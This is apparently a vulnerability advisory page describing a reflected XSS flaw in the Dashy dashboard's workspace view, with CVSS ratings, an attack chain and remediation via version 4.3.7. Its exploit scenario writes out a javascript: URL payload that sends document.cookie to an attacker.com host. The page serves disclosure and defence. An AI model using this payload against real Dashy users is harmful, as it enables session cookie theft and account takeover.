Skip to main content

Dashy EUVDEUVD-2026-42103

| CVE-2026-55592 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-07-07 GitHub_M
3.9
CVSS 3.1 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M) PRIMARY
3.9 LOW
AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Exploit delivery is a remotely-sent URL (AV:N); attacker requires no Dashy credentials (PR:N); victim must actively click the link (UI:R); impact is partial confidentiality and integrity within the Dashy origin only.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Attack Vector
Local
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Patch available
Jul 07, 2026 - 22:01 EUVD
Analysis Generated
Jul 07, 2026 - 21:50 vuln.today

DescriptionCVE.org

Dashy is a self-hostable personal dashboard. Prior to 4.3.7, Dashy's workspace view trusts the url query parameter and assigns it directly to an iframe source without scheme validation. If a logged-in user opens a crafted workspace link containing a javascript: URL, JavaScript runs on the Dashy origin and can read same-origin browser data, interact with the Dashy DOM, and send requests as the victim. This issue is fixed in version 4.3.7.

AnalysisAI

Reflected XSS in Dashy's workspace view allows a remote attacker to execute arbitrary JavaScript in the victim's browser within the Dashy origin by tricking an authenticated user into visiting a crafted URL containing a javascript: scheme in the url query parameter. All Dashy releases prior to 4.3.7 are affected. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify authenticated Dashy user target
Delivery
Craft javascript: URL workspace payload
Exploit
Deliver malicious link via phishing or social engineering
Execution
Victim clicks link while holding active session
Persist
javascript: URL executes in Dashy same-origin context
Impact
Exfiltrate same-origin data or issue authenticated requests

Vulnerability AssessmentAI

Exploitation Exploitation requires two concrete conditions: (1) the victim must be an authenticated, currently logged-in Dashy user at the time they open the crafted link - unauthenticated sessions are not exploitable; and (2) the victim must actively open a specially crafted URL that places a javascript: payload in the url query parameter of the Dashy workspace view endpoint. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor-assigned CVSS 3.9 (Low) applies AV:L (Local), likely reflecting Dashy's typical deployment as a locally-accessible or home-network service. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a target running a personal Dashy instance and crafts a URL such as https://dashy.example.com/workspace?url=javascript:fetch('https://attacker.com/?c='+document.cookie), then delivers it to the victim via a phishing email or message. When the logged-in victim clicks the link, the javascript: payload executes within the Dashy origin, exfiltrating session cookies or other same-origin data to the attacker-controlled server. …
Remediation Upgrade Dashy to version 4.3.7, which patches the vulnerability by adding scheme validation to the url query parameter before it is assigned as the iframe src attribute; the release is available at https://github.com/lissy93/dashy/releases/tag/4.3.7. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-42103 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy